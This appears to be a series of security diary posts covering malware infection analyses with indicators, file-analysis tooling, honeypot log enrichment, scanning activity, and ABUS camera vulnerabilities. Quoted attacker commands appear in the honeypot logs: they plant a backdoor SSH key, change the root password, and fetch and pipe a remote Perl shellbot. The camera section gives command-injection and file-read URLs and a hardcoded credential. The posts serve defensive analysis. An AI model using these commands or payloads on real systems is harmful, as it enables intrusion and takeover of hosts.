Introduction

Also known as DBatLoader, ModiLoader is malware that retreives and runs payloads like Formbook, Warzone RAT, Remcos RAT, or other types of malware.  Today's diary reviews a ModiLoader infection for Remcos RAT on Monday 2023-05-29.

Shown above:  Flow chart for the ModiLoader Remcos RAT infection on Monday 2023-05-29.

Email

I caught the email in one of my honeypot accounts on Monday 2023-05-29 at 4:14 UTC.  These messages often spoof companies sending invoices or purchase orders.  This campaign didn't appear to be specifically targeted at my honeypot account.

Shown above:  Screenshot of the email distributing ModiLoader for Remcos RAT on Monday 2023-05-29.

The email contains an ISO image presented as a purchase order.  The ISO image contains a Windows executable (EXE) file for ModiLoader.  The EXE file icon impersonates an Excel spreadsheet.

Shown above:  The attached ISO image contains a malicious Windows EXE file for ModiLoader.

This ModiLoader EXE will infect a vulnerable Windows host with Remcos RAT.  Let's look at the infection traffic.

Infection Traffic

The ModiLoader EXE first generated a OneDrive URL using HTTP over TCP port 80. This redirected to an HTTPS version of the same URL over TCP port 443.

Shown above:  Traffic from an infection filtered in Wireshark.

Shown above:  Initial traffic generated by ModiLoader redirected to an HTTPS version of the same URL.

The OneDrive URL returned a base64 text file, approximately 4.3 MB in size.  I retrieved a copy of it by entering the URL in a web brower.

Shown above:  Using a web browser to retrieve base64 text file returned from OneDrive URL generated by the ModiLoader EXE.

Shortly after ModiLoader retrieved the base64 text file, my infected host started generating TLSv1.3 infection traffic to a server at 146.70.158[.]105 over TCP port 9138.  Online sandbox analysis indicates this is Remcos RAT traffic, so I'm calling 146.70.158[.]105 a Remcos RAT C2 server.

Shown above:  Wireshark showing TLSv1.3 traffic from the infected Windows host.

No domain is associated with this Remcos RAT C2 server.  Checking it in a web browser revealed the server used a self-signed certificate.  No identification fields were used for this self-signed certificate.

Shown above:  Info about self-signed certificate used for TLSv1.3 traffic to the Remcos RAT C2 server.

At least 49 MB of data was sent from the infected Windows host to the Remcos RAT C2 server, as shown below when viewing TCP conversation statistics of the traffic in Wireshark.

Shown above:  TCP conversation statistics in Wireshark reveal the infected host sent at least 49 MB of data to the Remcos RAT C2 server.

The infected Windows host also checked its location using geoplugin.net, which is a legitimate service.

Forensics on the Infected Windows Host

This infection was made persistent through the Windows registry key at HKCU\sofware\Microsoft\Windows\CurrentVersion\Run.  Persistent files were stored in the host's C:\Users\Public\Libraries directory.

Shown above:  ModiLoader/Remcos RAT files persistent on the infected Windows host.

Indicators of Compromise (IOCs)

Some headers from the email:

Return-Path: <william.cheng@foodicon[.]com[.]sg>
Received: from cp2-de1.host-global[.]net (cp2-de1.host-global[.]net [88.99.82[.]246])
    for <[recipient's email address]>; Mon, 29 May 2023 04:14:43 +0000 (UTC)
Received: from ec2-3-135-201-214.us-east-2.compute.amazonaws[.]com ([3.135.201[.]214]:55643)
    by cp2-de1.host-global[.]net with esmtpa (Exim 4.96)
    Mon, 29 May 2023 06:14:35 +0200
From: PT Sree International Indonesia <info@ptsreint[.]co[.]id>
Subject: New Inquiry/Purchase Order June 2023
Date: 29 May 2023 04:14:33 +0000
Message-ID: <20230529041433.6E03B75D7043B6B7@ptsreint[.]co[.]id>

Traffic from an infected Windows host:

• hxxp://onedrive.live[.]com/download?cid=477DD5F55B8A76A6&resid=477DD5F55B8A76A6%21132&authkey=AHpfAKNpV3kAUSU
• hxxps://onedrive.live[.]com/download?cid=477DD5F55B8A76A6&resid=477DD5F55B8A76A6%21132&authkey=AHpfAKNpV3kAUSU
• hxxps://u7xd4q.bn.files.1drv[.]com/y4mnljoeykY0rqANGppY0yGovJuGPFqCUKN1PI2BK5j71L0nAtxaBfppI5gHLhyPiXM3swFe-quRw1e41cGALOL4QoSWpyud0yDeU-ImxNuXWR9bIksaWiXsgL2UyTD2D2DtHZaxPuuqz7hy09zjLvcrr_HTTMA8fF4iRUQ1H6Bjm6lTFEK9eLm6t5M9xXenlHLDiE4qye22jg5SWe5cmmDrA/177_Dmzsccoibbg?download&psid=1
• 146.70.158[.]105 port 9138 - TLSv1.3 traffic for Remcos RAT
• hxxp://geoplugin.net/json.jp  <-- IP address/location check of the infected host

Malware from the infected Windows host:

SHA256 hash: f69e25c8c6d512b60024504124d46cfbf08741bc7f53104466d1483f034a73e4

• File size: 1,638,400 bytes
• File name: Urgent Inquiry_Purchase order June 2023_PDF.iso
• File description: Email attachment, an ISO disk image containing DBatLoader/ModiLoader EXE

SHA256 hash: de33fd9d4c89f8d5ffad69cb7743922d8d22f54890f9ca69161edce001cba9ad

• File size: 1,047,552 bytes
• File name: Urgent Inquiry_Purchase order June 2023_PDF.exe
• Persistent file location: C:\Users\Public\Libraries\Dmzsccoi.exe
• File description: ModiLoader EXE
• Analysis: https://tria.ge/230529-vtyr7sdc5x/behavioral2
• Analysis: https://app.any.run/tasks/8f428a98-e2b5-49ae-a073-b4feb6c9f4ca
• Analysis: https://capesandbox.com/submit/status/393224/
• Reference: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

SHA256 hash: 1d863f9486cef770383b16ed95763abe222b702dafad4e529793288c83fff52f

• File size: 4,289,728 bytes
• File description: Base64 text file retrieved from OneDrive URL generated by ModiLoader malware
• File location: hxxps://onedrive.live[.]com/download?cid=477DD5F55B8A76A6&resid=477DD5F55B8A76A6%21132&authkey=AHpfAKNpV3kAUSU

SHA256 hash: a2796cc5deaca203fd9c1ed203517c74b8fd516619cd0ded67551f727498dcb3

• File size: 3,217,294 bytes
• File location: C:\Users\Public\Libraries\Dmzsccoi
• File description: Data binary decoded from above base64 text file

SHA256 hash: 13ad5aa8c9424fd866ea5b5ed6f603983c626f60cdb5b680c98cd046174b4667

• File size: 100 bytes
• File location: C:\Users\Public\Libraries\ioccszmD.url
• File description: URL file persistent through Windows registry
• URL file target: C:\\Users\\Public\\Libraries\\Dmzsccoi.exe

SHA256 hash: 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

• File size: 68,096 bytes
• File location: C:\Users\Public\Libraries\ioccszmD.pif
• File description: Another Windows EXE used for this infection

Final Words

This example of ModiLoader/Remcos RAT was not targeted, nor was it particularly sophisticated.  Emails using ISO attachments to deliver malware are routinely submitted to VirusTotal.  I did a quick search for the last week of ISO attachments in VirusTotal, and I found 15 examples.

Shown above:  Results of a search for ISO attachments from emails submitted to VirusTotal from 2023-05-22 until the date of this diary.

A sanitized copy of the email, along with malware/artifacts from the infection, and a packet capture (pcap) of the infection traffic are available here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

I was asked how to analyze Office Documents that are embedded inside PPT files. PPT is the "standard" binary format for PowerPoint, it's an olefile. You can analyze it with oledump.py:

All embedded content is found inside stream "PowerPoint Document". For VBA, I already wrote a blog post a couple years ago: "Analyzing PowerPoint Maldocs with oledump Plugin plugin_ppt".

The analysis process for embedded files is quite similar. We use plugin plugin_ppt:

A PowerPoint Document stream is a list of records. Plugin plugin_ppt parses these records.

Record 56 is marked with an exclamation mark: !. That tells us that this record contains embedded content.

We can select this record for further analysis. Since the parsing is done by the plugin, we need to instruct the plugin to select this record with the appropriate option (-s). Options for plugins are passed via oledump's option pluginoptions. Like this:

We can do an HEX/ASCII dump with options -a, to take a peek at the content:

This content is zlib compressed. To decompress it an dump it, we use option -e. But we also need to use oledump's option -q (quiet) so that oledump does not produce any output, and that the sole output comes from the plugin. Like this:

We can pass this to file-magic.py to identify the decompressed content:

It is a "Composite Document File V2 Document", or ..., an ole file. So we can just parse this with another instance of oledump.py:

The embedded file is contained inside the Package stream, the other streams contain metadata. That can be parsed with plugin plugin_olestreams:

The metadata tells us that the embedded file is a Word document.

Let's check:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

Wireshark version 4.0.6 was released with 9 vulnerabilities and 15 bugs fixed.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

I read recently that disregarding cyber risks is a way of inviting trouble and unnecessary attention to any organization. Cyber threats is nothing new, everyone is a target taking many forms whether it is by some form of scanning or targeted phishing. For example, Sophos describes the naughty nine which are all some form of services that can be purchased for a price (i.e. access, malware, phishing, crypting, etc). "Just as information technology companies have shifted to “as-a-service” offerings, so has the cybercrime ecosystem." [1] This is no surprise that ransomware is still the one thing that affect the most organizations and, in the end, cost the most if you have no choices but to pay the ransom. In the case of the Hospital for Sick Children in Toronto, lockbit , "[...] issued a brief apology and offered SickKids a free decryptor to unlock its data." [2] but this is far from always being the case. In the end, they did not use the decryptor but that isn't always the case.

All companies have some form of valuable data where it stores and collect sensitive information such as customer data, financial information or intellectual property. When that information isn't adequately protected, it can also cause injury to partners and suppliers.

Protection of data isn't always because we need to get more tools but can also involve sound security principles such as active monitoring, detection and resolution of suspicious behavior onPrem and in the cloud of endpoint and of all that data collected. Cyber attacks are a threat to all businesses of any size and the cost of ignoring them can be very costly. 

[1] https://assets.sophos.com/X24WTUEQ/at/b5n9ntjqmbkb8fg5rn25g4fc/sophos-2023-threat-report.pdf
[2] https://www.cbc.ca/news/canada/toronto/sickkids-attack-1.6705843
[3] https://www.cnet.com/tech/services-and-software/average-data-breach-costs-hit-a-record-4-4-million-report-says/  

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Introduction

Twitter user @0xToxin has reported seeing malicious emails impersonating DocuSign with HTML attachments this past week or so.  Samples are available here.

Very little public information exists on this specific campaign, so today's diary reviews information on it.

Image 1:  Flow chart for the infection chain.

HTML Attachments

Although, Twitter user @ffforward has stated this campaign started sometime in 2022, I can only confirm confirm one additional date based on the HTML template, file name, and post-infection traffic from @0xToxin's publicly-shared samples.

I collected the following data from VirusTotal and confirmed it is the same campaign.

From 2023-05-10:

SHA256 hash: 064ee9cc4256a4e004d3c6e74e1a4cc2d686f82a7e22640aa718167b5af40a29

• File name: May10-Invoice-DocuSign-6345036.html

SHA256 hash: 1b1ee0937147d8867227ea72654d3aa7acb54d5bc1d31b7922586f12a30beeb4

• File name: May10-Invoice-DocuSign-945225.html

SHA256 hash: efbb83a531b88d0820d36410356cc4c8deef25deaa8da351a963dd51eadf8048

• File name: May10-Invoice-DocuSign-91218.html

Downloaded zip name: May10-Invoice-DocuSign.zip
Extracted .js name: May10-Invoice-DocuSign.js

From: 2023-05-25:

SHA256 hash: 418c0706510868bf2afad98bfb66d7492fdb594ca8d477aba89f471ca00d70fd

• File name: Invoice DocuSign May 25 2023 6841006.html

SHA256 hash: d075b86f23ea2f16db1bbbe5d8b141fde60b1655fc48b46335bb8554235bac32
File name: Invoice DocuSign May 25 2023 34261.html

Downloaded zip name: Invoice-DocuSign-May25-2023.zip
Extracted .js name: Invoice-DocuSign-May25-2023.js

Preliminary analysis indicates all HTML file attachments for a specific day of spamming generate the same file hash for the downloaded zip archive and extracted .js file.

Images From An Infection

Image 2:  HTML attachment opened in a web browser presents a zip archive to download.

Image 3:  The zip archive contains an obfuscated script file.

Image 4:  The infection is kept persistent through a scheduled task that contains the C2 URL.

Image 5:  The persistent VBS is merely a WScript command to run PowerShell, and it uses parameters for the C2 from the scheduled task command.

Traffic From An Infected Windows Host

Traffic from this infection occurs using HTTP GET and POST requests to 159.65.42[.]223 over TCP port 80.  The initial HTTP GET request returns script to gather information about the infected Windows host.  The second HTTP request is a POST that sends the collected information to the C2 server.  After that initial POST request, the infected Windows host checks in to the C2 server approximately once every minute.

The 16-character string at the end of the C2 URL is unique for each infected host.

I let the infection run in my lab for over an hour, but I saw no follow-up activity.  Only the check-in traffic every minute.

Image 6:  Traffic from the infection filtered in Wireshark.

Image 7:  Initial HTTP GET request returns script to gather info on the infected Windows host.

Image 8:  The initial HTTP POST request sends collected data to the C2 server.

Image 9:  The infected Windows host then checks in approximately once every minute.

Final Words

This campaign may have started sometime last year.  C2 traffic is based on the scheduled task as shown above in Image 4.  This script-based malware sends information about the infected host to a C2 server.  At some point, this would probably lead to further malware.

So far, the collected malware is available on Malware Bazaar using the tag 159-65-42-223, at least until the threat actor decides to change C2 servers.

If anyone knows further information on this campaign, feel free to share in the comments!

---
Brad Duncan
brad [at] malware-traffic-analysis.net

Recently, I was involved in a network outage caused by a defective pfSense firewall appliance. Due to storage issues (with the onboard flash), the firewall did not boot anymore. This can be quickly solved from a hardware point of view because this firewall model has a slot to install an M2-compatible flash device and boot from it. But, there was a problem with the configuration. The last backup they had was pretty old, and they made a lot of changes. No debate about the fact that a robust backup process should have been implemented. Let's focus on the challenge of recovering the last configuration from the firewall. Challenge accepted!

First, I booted the firewall on an emergency USB stick and serial console access. First tip: always keep your console cables and emergency boot devices in a safe place. Once on the firewall, I tried to access the last configuration (stored as a big XML file) without luck. It was impossible to mount the corrupted filesystem. Because the file system was too big, it was impossible to take an image and store it on a USB key. Let's dump it through the network! I manually configured a NIC to connect to a server and used our best friend: netcat!

# dd if=/dev/mmcsd0 | nc 192.168.254.8 8888

Let's boot a SIFT Workstation to start a listener:

# nc -l -p 8888 >pfsense.raw

After a long time, I had an image of the corrupted file system on a remote host, ready to be investigated. I did not change the default block size ("bs") parameter to ensure a safe copy and avoid errors.

Now, let's find a way to extract interesting information from the disk image (remember, I need to extract the last configuration). I tried to mount the disk but again, no luck. So I decided to speed up the analysis and try to perform data carving. When data carving is mentioned, many people think about the tool bulk_extractor[1]. This tool tries to find interesting pieces of information from a disk image. It looks for "structured information" (email addresses, credit card numbers, URLs, images, ...). In my case, I was looking for a specific file and decided to use another tool: Scalpel[2]. This one performs file carving operations based on patterns that describe particular files or data fragment "types". You may define these patterns based on fixed strings or regular expressions. The tool is pretty old but you can find any modern file due to its flexible configuration. The good news is that Scalpel is installed on the SIFT Workstation[3]. By default, XML files are not carved. Let's enable this in the configuration file (/etc/scalpel/scalpel.conf). Just add the following line:

xml     n   10000000    <?xml    </pfsense>

This instructs Scalpel to search for XML files starting with "<?xml" and ending with "</pfsense>" (That's how pfSense configurations are stored). The file size is a maximum of 10M, and we don't verify the case ('n') in patterns.

Now, let's cross our fingers and scan the disk image:

# scalpel -v -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw

Once the scan is completed, an audit file is generated:

Scalpel version 1.60 audit file
Started at Thu May 22 12:28:06 2023
Command line:
scalpel -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw 

Output directory: /tmp/carved
Configuration file: /etc/scalpel/scalpel.conf

Opening target "H="

The following files were carved:
File          Start            Chop        Length        Extracted From
00000003.xml    156532736        NO          8384365        pfsense.raw
00000002.xml    156368896        NO          8548205        pfsense.raw
00000001.xml    156303360        NO          8613741        pfsense.raw
...

This time, it was successful, and 52 files were carved. Which one is the right configuration? You need to remove the false positive ones (for example, the smallest ones). You can also grep for interesting strings. After a few extra checks, we were confident about the right file. We copied back to the firewall with the fresh install, rebooted, and the system was back alive!

In conclusion, DFIR techniques can be very helpful when your infrastructure is down, but it will cost time (read: money!). The best is, of course, to have a strong backup/restore process.

[1] https://github.com/simsong/bulk_extractor
[2] https://github.com/sleuthkit/scalpel
[3] https://www.sans.org/tools/sift-workstation/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Recently I was discussing Alert/Case management tools for SOCs. I started thinking about what were the key points I used when deciding. Depending on how big your SOC is, you will have different priorities for each point if you have customer SLA's and a turnover. But these are the things I look for, in no particular order.

• Open Source
• Alert and Case Management
• Artifact Enhancement
• Playbook/Work Flows
• Metrics

 

TheHive (1)

This has been my favorite tool for managing cases for a while. In the last year, it has gone to a pay model, if you use TheHive version 5. Support for 4 has stopped, but you can still use it. I did a quick look, and I didn't see anyone with a Forked version 4 supporting it. Metrics in version 3 could have been better, and in 5, they have improved. It also supports marking cases with ATT&C techniques. Elastalert has direct support for Hive, which is an excellent and easy way to get alerts from SecurityOnion into your case system. They use Cortex for enhancing artifact information, which has a great plugin architecture. Most people are familiar with TheHive, so I'll skip any screenshots. It's a great project, and if you have the money to allocate, I suggest supporting this project for your SOC.

 

DFIR-IRIS (2)

It is a robust system that can run as a docker and the database is Postgres. In the latest revisions, released this month, they have added support for alert tracking. Alerts can be fed into their system using their API (No Elastalert support yet..) You can convert alerts into cases easily. You can create case templates that contain playbooks for what to do. If you put your information in the right places, the generated report feature does a very nice readable report. They currently do not have predefined ATT&CK techniques, but you can tag most items you add in cases. This project is very active and doing a great job with adding features. They already have a full demo online to try (3), so go take a look! 

 

Alert queue

The alert queue was added in the latest release. There is an API to get alerts into the system. 

 

 

Case Management

 

At the top of the case, view is where you access the different parts of the case. Assets are where you list which assets are involved in the incident. Typically with TheHive, I would create a new task per device and put in the notes for each compromised asset. This is a nice feature to quickly see what is involved.

 

 

Notes Section

I've only messed around with the demo, but I'm unsure how to use the note section now. You can group things together nicely, but in real cases, I would have to see if the input fields from the tasks were not enough to meet the needs first.

 

 

Case Template/Playbooks

Creating templates is easy to do. These end up in the task area of the case, where they can be used to walk the responder through tasks for the case type.

 

 

You can add files to the case along with IOCs.

 

 

They do have some modules and enrichment, but only a little for now. A 3rd party module by SOCfortress will integrate with Cortex, giving you a ton of flexibility. (4)

 

 

There is at least one more alert manager I plan on covering in the future, but let me know what you are using and why you like it in the comments.

 

(1) https://thehive-project.org/

(2) https://dfir-iris.org/

(3)https://v200.beta.dfir-iris.org/welcome

(4)https://github.com/socfortress/iris-cortexanalyzer-module

 

 

--

Tom Webb

@tom_webb@infosec.exchange

While reviewing cowrie [1] logs from my honeypot [2] and developing my cowrieprocessor python script [3], I've been interested in adding information to understand more about some of the attack sources. 

• Are these attacks performed by people behind a keyboard or simply bots on the internet?
• Where are the attacks coming from?
• What infrastructure is being used to initiate the attack?

Through the process of trying to answer some of these quesitons, I've added several different enrichment options to this script, as long as an API key is supplied to use it. These include:

• SANS Internet Storm Center (ISC) API for WHOIS data [4]
• Virus Total API for hash lookups of uploaded/submitted files to the honeypot [5]
• URLhaus for malicious IP address data [6]
• SPUR.us for IP enrichment for WHOIS, infrastructure and VPN/proxy data [7]

Figure 1: Example honeypot data with additional SPUR.us enrichment

In addition to the most recent addition of SPUR.us over the last few days, I've also added the "duration" of the attack to my summaries to see if there were any interesting artifacts based on the timespan for the attack. For example, if an attack was being performed by an individual behind a keyboard, I would anticipate the duration to be longer. There were some other possibilities when thinking about a human actor behind a keyboard and what might be seen:

• Longer attack durations
• More use of VPNs or other anonymization services
• Mistyped commands
• Repeated commands back to back

These are just some of may hypotheses, but I figured a bit more data might help understand this a bit. Here is one example with data enrichment that now more definitively calls out that this might come from a datacenter network. 

                       Session  fd5ac84ee8f9                                      
              Session Duration  10.40 seconds                                     
                      Protocol  ssh                                               
                      Username  root                                              
                      Password  Admin123$                                         
                     Timestamp  2023-05-24T06:23:58.906514Z                       
             Source IP Address  142.93.64.69                                      
               URLhaus IP Tags                                                    
                        ASNAME  DIGITALOCEAN-ASN                                  
                     ASCOUNTRY  US                                                
            Total Commands Run  20    
                      SPUR ASN  14061                                             
         SPUR ASN Organization  DIGITALOCEAN-ASN                                  
             SPUR Organization  DigitalOcean, LLC                                 
           SPUR Infrastructure  DATACENTER                                        
           SPUR Client Proxies  ['SHIFTER_PROXY']                                 
                    SPUR Risks  ['CALLBACK_PROXY']                                
                 SPUR Location  Clifton, New Jersey, US                           

------------------- DOWNLOAD DATA -------------------

                  Download URL                                                    
         Download SHA-256 Hash  a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
              Destination File  /root/.ssh/authorized_keys                        
                VT Description  Text                                              
      VT Threat Classification  trojan.shell/linux                                
            VT First Submssion  2018-07-05 12:21:41
             VT Malicious Hits  21    

                  Download URL                                                    
         Download SHA-256 Hash  01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
              Destination File  /etc/hosts.deny                                   
                VT Description  JavaScript                                        
      VT Threat Classification                                                    
            VT First Submssion  2009-03-05 06:45:38
             VT Malicious Hits  0     

////////////////// COMMANDS ATTEMPTED //////////////////

# cd ~; chattr -ia .ssh; lockr -ia .ssh
# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
# cat /proc/cpuinfo | grep name | wc -l
# echo "root:J9uoMrirSMHb"|chpasswd|bash
# rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
# ls -lh $(which ls)
# which ls
# crontab -l
# w
# uname -m
# cat /proc/cpuinfo | grep model | grep name | wc -l
# top
# uname
# uname -a
# whoami
# lscpu | grep Model
# df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

We can also see that the attack duriation is 10 seconds, which is short when compared to most other attacks. There's also another nearly identical attack, but coming from a VPN. This VPN attack takes about 1.5 times longer, however. 

                       Session  909bea239054                                      
              Session Duration  26.73 seconds                                     
                      Protocol  ssh                                               
                      Username  root                                              
                      Password  qwe@1234                                          
                     Timestamp  2023-05-24T04:41:29.843213Z                       
             Source IP Address  43.154.116.34                                     
               URLhaus IP Tags                                                    
                        ASNAME  TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue
                     ASCOUNTRY  CN                                                
            Total Commands Run  20    
                      SPUR ASN  132203                                            
         SPUR ASN Organization  Tencent Building, Kejizhongyi Avenue              
             SPUR Organization  6 COLLYER QUAY                                    
                    SPUR Risks  ['TUNNEL']                                        
                 SPUR Services  ['SSTP', 'OPENVPN']                               
                 SPUR Location  Central, Central and Western District, HK         
         SPUR Anonymous Tunnel  True                                              
              SPUR Tunnel Type  VPN                                               

------------------- DOWNLOAD DATA -------------------

                  Download URL                                                    
         Download SHA-256 Hash  a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
              Destination File  /root/.ssh/authorized_keys                        
                VT Description  Text                                              
      VT Threat Classification  trojan.shell/linux                                
            VT First Submssion  2018-07-05 12:21:41
             VT Malicious Hits  21    

                  Download URL                                                    
         Download SHA-256 Hash  01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
              Destination File  /etc/hosts.deny                                   
                VT Description  JavaScript                                        
      VT Threat Classification                                                    
            VT First Submssion  2009-03-05 06:45:38
             VT Malicious Hits  0     

////////////////// COMMANDS ATTEMPTED //////////////////

# cd ~; chattr -ia .ssh; lockr -ia .ssh
# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
# cat /proc/cpuinfo | grep name | wc -l
# echo "root:aeUVqyLmI0Sy"|chpasswd|bash
# rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
# ls -lh $(which ls)
# which ls
# crontab -l
# w
# uname -m
# cat /proc/cpuinfo | grep model | grep name | wc -l
# top
# uname
# uname -a
# whoami
# lscpu | grep Model
# df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

This doesn't say that one is definitely fully automated and the other is a person, but gives some more data points to compare two identical attacks. When looking at attacks with data being uploaded or downloaded to the honeypot, we can also get some additional data from those addreses as well. 

                       Session  8d39860bce79                                      
                      Protocol  ssh                                               
                      Username  root                                              
                      Password  qwerty123456                                      
                     Timestamp  2023-05-22T16:48:41.724475Z                       
             Source IP Address  45.79.54.105                                      
               URLhaus IP Tags                                                    
                        ASNAME  LINODE-AP Linode, LLC                             
                     ASCOUNTRY  US                                                
            Total Commands Run  1     
                      SPUR ASN  63949                                             
         SPUR ASN Organization  Akamai Connected Cloud                            
             SPUR Organization  Linode                                            
           SPUR Infrastructure  DATACENTER                                        
         SPUR Client Behaviors  ['TOR_PROXY_USER']                                
                 SPUR Location  Richardson, Texas, US                             

------------------- DOWNLOAD DATA -------------------

                  Download URL  http[://]103[.]52[.]134[.]51/csx/perlNIK          
         Download SHA-256 Hash  bb4c8ee23103cd57741a1008552dae1038c17c505dd16f80571d795d91892cad
              Destination File                                                    
                VT Description  Perl                                              
      VT Threat Classification  trojan.perl/shellbot                              
            VT First Submssion  2023-05-15 07:28:09
             VT Malicious Hits  39    
       Download Source Address  103.52.134.51                                     
               URLhaus IP Tags                                                    
                        ASNAME  MCN-BD Kazi Sazzad Hossain TA Millennium Computers & Networking
                     ASCOUNTRY  BD                                                
                      SPUR ASN  63949                                             
         SPUR ASN Organization  Akamai Connected Cloud                            
             SPUR Organization  Linode                                            
           SPUR Infrastructure  DATACENTER                                        
         SPUR Client Behaviors  ['TOR_PROXY_USER']                                
                 SPUR Location  Richardson, Texas, US                             

////////////////// COMMANDS ATTEMPTED //////////////////

# wget -qO - 103.52.134.51/csx/perlNIK|perl

In the future I may also added some additional sources such as Shodan [8], but I also want to keep the summaries as short as possible so that they can be quickly reviewed.

Let me know if you think there's a good source of data to give more context to these kinds of logs.

[1] https://github.com/cowrie/cowrie
[2] https://github.com/DShield-ISC/dshield
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://isc.sans.edu/api/
[5] https://developers.virustotal.com/reference/overview
[6] https://urlhaus.abuse.ch/
[7] https://spur.us/
[8] https://www.shodan.io/

--
Jesse La Grew
Handler

Please let me know if you have any idea what they are trying to do here :)

I noticed today that our honeypots detected a few scans for Apache "Nifi." Nifi is a Java-based system that allows for the routing of data. It will enable you to select data from a source (let's say from a CSV file) and output it to a database. Numerous sources and destinations are supported. Dataflows are created via a web-based GUI. One critical use case of Apache Nifi is to prepare and import data into machine learning systems.

Today, I noticed a spike in requests for the URL "/nifi", the default URL used for the NiFi GUI.

Almost all the reports come from the same user-agent and IP address:

User-Agent: Go-http-client/1.1
Source IP: %%ip:109.207.200.43%%

The source IP, located in the Ukraine, has a history of scanning for various vulnerabilities, but nothing I would assign to a particular bot. Just "random" URLs like:

• /boaform/admin/formLogin
• blank.org:443

There are a couple other IPs and User-Agents used to scan for Nifi:

%%ip:65.154.226.171%% - Claiming to use headless chrome on Linux and Chrome on Windows. Reasonably recent versions so they may be real user agents.
%%ip:205.169.39.250%% - Claiming to use Chrome, but ancient versions so I assume these user agents are fake

Both of these IPs are part of Qwest/CenturyLink/Lumen. 65.154.226.171 at least used to be part of Paloalto.

But the real question: What are they looking for? Trying to steal data from badly secured NiFi installs? Poisoning ML data? cryptomining... ? There isn't a vulnerability that I would consider, other than bad configurations with no/weak/default passwords.

Let me know if you use NiFi, and if you have an idea what they may be looking for.

 

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

ABUS is usually better known for its "old-fashioned" mechanical locks. But as part of its b "Industry Solution" portfolio of products, ABUS is offering some more high-tech solutions, like, for example, network-connected cameras [1]. Sadly, these cameras suffer from some of the same vulnerabilities as many similar cameras.

In February, Peter Ohm disclosed a vulnerability affecting ABUS cameras on the full disclosure mailing list [2]. The disclosure includes three different vulnerabilities,

1 - Local File Inclusion

This vulnerability can be used to read arbitrary files:

cgi-bin/admin/fileread?READ.filePath=[filename]

 

2 - Remote command injection vulnerability

/cgi-bin/mft/wireless_mft?ap=irrelevant;[command]

This vulnerability allows for arbitrary command injection. Instead of a semicolon, an attacker could also use a pipe or a carriage return.

3 - Fixed "maintenance" account

The affected cameras use the following credentials for a built-in "maintenance" account.

manufacture erutcafunam

 

Among these vulnerabilities, the remote command execution vulnerability is the most interesting one. Yesterday, our sensor picked up exploit attempts consistent with this vulnerability:

/cgi-bin/mft/wireless_mft?ap=irrelevant;{payload}

I did not obfuscate the command. The attacker did not correctly expand the command parameter. Maybe they are using a Python "f-string" but forgot the leading "f"?

All the attacks originate from an unconfigured server (%%ip:45.95.147.229%%) in the Netherlands. This server has a history of attempts to exploit various common vulnerabilities.

But there is more...

Our web application honeypots have been around for a while, so we have some history to look back at. Similar exploit attempts are going back to 2015:

+------------+--------------------------------------------------------------------+
| date       | url                                                                |
+------------+--------------------------------------------------------------------+
| 2015-07-12 | /cgi-bin/mft/wireless_mft                                          |
| 2015-07-13 | /cgi-bin/mft/wireless_mft                                          |
| 2015-07-13 | /cgi-bin/mft/wireless_mft?ap=testname;cat%20/var/www/secret.passwd |
